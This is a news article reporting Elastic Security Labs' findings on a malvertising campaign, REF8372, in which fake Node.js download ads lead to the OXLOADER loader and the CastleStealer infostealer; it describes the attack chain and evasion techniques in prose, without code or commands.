Cybersecurity researchers have identified a new malware distribution campaign that uses fraudulent Google advertisements to deliver CastleStealer through a previously undocumented malware loader known as OXLOADER. The campaign, tracked by Elastic Security Labs under the designation REF8372, highlights the continued use of online advertising platforms as an entry point for malware infections. Researchers believe the operation is financially motivated and likely linked to Russian speaking threat actors, citing explicit safeguards within the malware designed to avoid infecting systems located in Commonwealth of Independent States countries. The campaign demonstrates a combination of social engineering, abuse of legitimate cloud services, and advanced malware development techniques aimed at avoiding detection and extending operational lifespan. According to Elastic Security Labs researchers Daniel Stepanic and Jia Yu Chan, OXLOADER incorporates multiple layers of code obfuscation, self modifying decryption routines, and unconventional methods for executing shellcode, making analysis and detection significantly more difficult.
The attack chain begins when users search for terms such as “lts version of node.js” through search engines and are presented with malicious advertisements that redirect them to a fraudulent website designed to resemble a legitimate software source. Investigators found that one of the fake domains used in the operation was node-js[.]prentiva99[.]info, which appeared through advertisements published under the verified advertiser name “ВОЛОДИМИР ТЕРЕЩЕНКО,” reportedly associated with Ukraine. Researchers have not determined whether this advertiser account belonged to the threat actors, was compromised, or had been acquired specifically for the campaign. Google removed the advertiser account and associated advertising campaigns on May 14, 2026. Once visitors interact with the deceptive website, they are prompted to download a batch script hosted on Storj, a decentralized cloud storage platform. The use of Storj illustrates how threat actors continue to exploit trusted and legitimate online services to bypass traditional domain reputation based security controls and avoid raising suspicion among potential victims.
Execution of the downloaded batch script presents users with a fake software installation wizard while secretly initiating the next stage of the infection process. In the background, a PowerShell command retrieves an executable hosted on Storj that serves as the OXLOADER payload. The malware is then launched with elevated privileges using the Windows User Account Control mechanism, increasing its ability to perform malicious actions on the infected system. Researchers observed that OXLOADER relies on DLL side loading techniques to execute a malicious dynamic link library, which subsequently decrypts and launches CastleStealer. The loader employs sophisticated evasion methods including control flow flattening, mixed Boolean arithmetic, self modifying code, and anti virtual machine capabilities intended to hinder security analysis and reduce detection rates. Elastic Security Labs noted that OXLOADER also abuses the Windows .reloc section to stage shellcode, a technique not commonly observed in mainstream malware campaigns and one that reflects a deliberate effort to complicate reverse engineering efforts.
CastleStealer itself is a .NET based information stealing malware designed to harvest sensitive user data and credentials from compromised systems. Researchers recently observed the malware being distributed alongside CastleLoader through a separate campaign known as BackgroundFix, which used a ClickFix style lure disguised as a free image editing application. CastleLoader has previously been associated with a threat activity cluster tracked as GrayBravo. Elastic Security Labs stated that while OXLOADER appears to be in the early stages of deployment, its architecture and implementation indicate a significant investment in development and operational security. The combination of layered obfuscation, anti analysis mechanisms, benign appearing code structures, and unique staging methods has resulted in low detection rates across many security engines and automated malware analysis environments. These characteristics provide threat actors with a valuable opportunity to distribute malware and collect information before defensive measures can adapt, making OXLOADER a malware family that security researchers and enterprise defenders are monitoring closely.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
